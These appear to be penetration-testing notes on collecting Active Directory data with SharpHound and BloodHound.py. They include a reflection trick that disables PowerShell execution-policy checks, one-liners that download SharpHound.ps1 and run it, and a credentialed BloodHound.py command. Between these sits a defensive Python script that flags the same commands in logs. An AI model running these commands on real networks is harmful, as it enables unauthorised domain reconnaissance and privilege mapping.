BloodHound / SharpHound Collection



Collecting data using SharpHound - 17-09-2018

Disable the execution policy check for the current PowerShell session:
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  
-------------------------------------------------------------------------------------------------------------------------
'Two liner'

powershell.exe -Exec Bypass

powershell -Command "[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1','SharpHound.ps1')"; Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All
------------------------------------------------------------------------------------------------------------------------

"Four Liner"
powershell.exe -Exec Bypass

powershell -Command "[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls, ssl3'; (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1','SharpHound.ps1')"

Import-Module .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All

------------------------------------------------------------------------------------------------------------------------

powershell.exe -Exec Bypass

Manually download - https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
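
For the defending side, the PowerShell commands above leave recognisable strings in process-creation and script-block logs. The following is an added example, not part of the original post or of BloodHound: a small triage script whose rule names, `host|text` line format and sample lines are all constructed assumptions.

```python
import re

# Indicators drawn from the commands shown above; rule names are this example's own.
RULES = {
    # powershell.exe -Exec Bypass (also matches -ep / -ExecutionPolicy)
    "execution_policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass\b", re.I),
    # Disable-ExecutionPolicy: reflection that replaces _authorizationManager
    "authorization_manager_swap": re.compile(r"_authorizationManager.*setvalue", re.I),
    # WebClient download of SharpHound.ps1
    "sharphound_script_download": re.compile(
        r"download(?:file|string)\s*\(.*sharphound\.ps1", re.I),
    # The collector entry point
    "invoke_bloodhound": re.compile(r"\binvoke-bloodhound\b", re.I),
}

# Bypass alone is common in legitimate automation, so it only rates "low".
WEAK = {"execution_policy_bypass"}


def triage(lines):
    """Map host -> (severity, sorted rule names) for hosts with at least one hit."""
    per_host = {}
    for line in lines:
        host, _, text = line.partition("|")
        for name, rx in RULES.items():
            if rx.search(text):
                per_host.setdefault(host.strip(), set()).add(name)
    return {
        host: ("high" if names - WEAK else "low", sorted(names))
        for host, names in per_host.items()
    }


# Constructed sample lines (host|text), not real telemetry.
SAMPLE = [
    "WS01|powershell.exe -Exec Bypass",
    "WS01|(New-Object Net.WebClient).DownloadFile("
    "'https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/"
    "Ingestors/SharpHound.ps1','SharpHound.ps1')",
    "WS01|Import-Module .\\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All",
    "BUILD07|powershell.exe -ExecutionPolicy Bypass -File build.ps1",
    'WS03|$ctx.gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, $mgr)',
    "WS02|Get-ChildItem C:\\Users",
]

if __name__ == "__main__":
    for host, (severity, names) in sorted(triage(SAMPLE).items()):
        print(f"{host}: {severity} {names}")
```

String matching of this kind only catches the commands as typed here; renamed scripts or obfuscated invocations need behavioural detections such as monitoring the LDAP and session enumeration the collector performs.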



=====================================================================
Collection using Python directly from a Linux box (no need for PowerShell):


git clone https://github.com/fox-it/BloodHound.py.git

./BloodHound.py/bloodhound.py -c All,LoggedOn -d evilcorp.local -dc 1.1.1.1  -u user -p 'password'  --dns-tcp
=====================================================================


